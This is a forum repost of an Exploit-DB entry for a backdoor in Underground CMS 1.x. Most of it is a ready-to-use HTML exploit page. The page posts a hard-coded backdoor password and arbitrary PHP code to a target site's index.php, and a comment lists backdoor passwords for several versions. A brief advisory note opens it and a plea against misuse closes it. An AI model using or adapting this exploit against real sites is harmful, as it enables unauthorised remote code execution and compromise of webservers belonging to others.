Exploit Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor Access

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30792
Проверка EDB
  1. Пройдено
Автор
D4M14N
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2007-11-21
HTML:
<!--
source: https://www.securityfocus.com/bid/26521/info

Underground CMS is prone to a backdoor vulnerability.

Attackers can exploit this issue to gain unauthorized access to the application. Successful attacks will compromise the affected application and possibly the underlying webserver.

Underground CMS 1.4, 1.7, and 1.8 are vulnerable; other versions may also be affected. 
-->

<head> <title>Ucms v. 1.8 Np exploit</title> <script type="text/javascript"> function sethost(seite) { document.host.action = seite + 'index.php?&q=test&e=1'; document.all.data.innerHTML = document.host.action; } </script> </head> <body onLoad="sethost('http://www.example.com/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request:<div id="data"></div> <br /> Host:<input type="text" value="http://www.ucmspage.de/" onKeyUp="sethost(this.value);" /> <form id="host" name="host" action="http://www.ucmspage.de/" method="POST"> Password:<input type="text" name="p" value="ZCShY8FjtEhIF8LZ"><br /> <!-- Additional info: You need a password to activate the backdoor we found these passwords: ZCShY8FjtEhIF8LZ (UCMS 1.8) mYM1NHtWtZk2KwrF (UCMS 1.4) wVCQUyhTga5Nmft1 (UCMS [?]) Just go into the file or similar files to find the passwords, for every version there is another password --> Phpcode:<br /> <textarea name="e" rows="20" cols="100"> phpinfo(); ?> </textarea> <br /> <input type="submit" value="exploit"> </form> </body> <!-- It�s just a crime to do such thigs, so please use this exploit just for knowledge and not to destroy the warez pages... thank you for you attention... Have a nice day --> </html>
 
Источник
www.exploit-db.com

Похожие темы